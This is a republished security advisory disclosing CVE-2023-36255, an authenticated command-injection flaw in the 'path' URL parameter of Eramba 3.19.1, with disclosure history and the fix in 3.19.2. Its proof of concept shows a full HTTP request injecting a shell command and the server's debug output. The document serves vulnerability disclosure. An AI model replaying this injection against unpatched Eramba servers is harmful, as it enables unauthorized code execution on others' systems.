Security
Headlines
HeadlinesLatestCVEs

Headline

Eramba 3.19.1 Remote Command Execution

Eramba version 3.19.1 suffers from a remote command execution vulnerability.

Packet Storm
#csrf#vulnerability#web#ubuntu#linux#apache#java#php#rce#pdf#auth#firefox
# Trovent Security Advisory 2303-01 ######################################Authenticated remote code execution in Eramba#############################################Overview########Advisory ID: TRSA-2303-01Advisory version: 1.0Advisory status: PublicAdvisory URL: https://trovent.io/security-advisory-2303-01Affected product: ErambaAffected version: 3.19.1 (Enterprise and Community edition)Vendor: Eramba Limited, https://www.eramba.orgCredits: Trovent Security GmbH, Sergey MakarovDetailed description####################Eramba is a web application for managing Governance, Risk, and Compliance (GRC).Trovent Security GmbH discovered that the Eramba web application allows remotecode execution for authenticated users.A possible attacker is able to modify the parameter "path" in the URL"https://hostname/settings/download-test-pdf?path=" to execute arbitrarycommands in the context of the user account the application is running in.To see the output of the executed command in the HTTP response, debug mode hasto be enabled.Severity: HighCVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)CVE ID: CVE-2023-36255CWE ID: CWE-94Proof of concept################HTTP request:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1Host: [redacted]Cookie: translation=1; csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateReferer: https://[redacted]/settingsUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~HTTP response:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~HTTP/1.1 500 Internal Server ErrorDate: Fri, 31 Mar 2023 12:37:55 GMTServer: Apache/2.4.41 (Ubuntu)Access-Control-Allow-Origin: *Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Disposition: attachment; filename="test.pdf"X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718Connection: closeContent-Type: text/html; charset=UTF-8Content-Length: 2033469<!DOCTYPE html><html><head>    <meta charset="utf-8"/>    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>        Error: The exit status code '127' says something went wrong:stderr: "sh: 1: --dpi: not found"stdout: "1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00    inet 127.0.0.1/8 scope host lo       valid_lft forever preferred_lft forever    inet6 ::1/128 scope host       valid_lft forever preferred_lft forever2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000    link/ether [redacted] brd ff:ff:ff:ff:ff:ff    inet [redacted] brd [redacted] scope global ens33       valid_lft forever preferred_lft forever    inet6 [redacted] scope link       valid_lft forever preferred_lft forever"command: ip a; --dpi '90' --lowquality --margin-bottom '0' --margin-left '0' --margin-right '0' --margin-top '0' --orientation 'Landscape' --javascript-delay '1000' '/tmp/knp_snappy6426d4231040e1.91046751.html''/tmp/knp_snappy6426d423104587.46971034.pdf'.    </title>[...]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Solution / Workaround#####################The vendor released a fixed version of Eramba.Fixed in version 3.19.2.History#######2023-03-31: Vulnerability found2023-04-04: Vendor contacted2023-04-17: Vendor confirmed vulnerability2023-04-20: Vendor released fixed version2023-05-25: Trovent verified remediation of the vulnerability2023-06-13: CVE ID requested2023-07-28: CVE ID received2023-08-01: Advisory published

Related news

CVE-2023-36255: Security Advisory 2303-01 - Trovent Security GmbH

An issue in Eramba Limited Eramba Enterprise v.3.19.1 allows a remote attacker to execute arbitrary code via the path parameter in the URL.

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution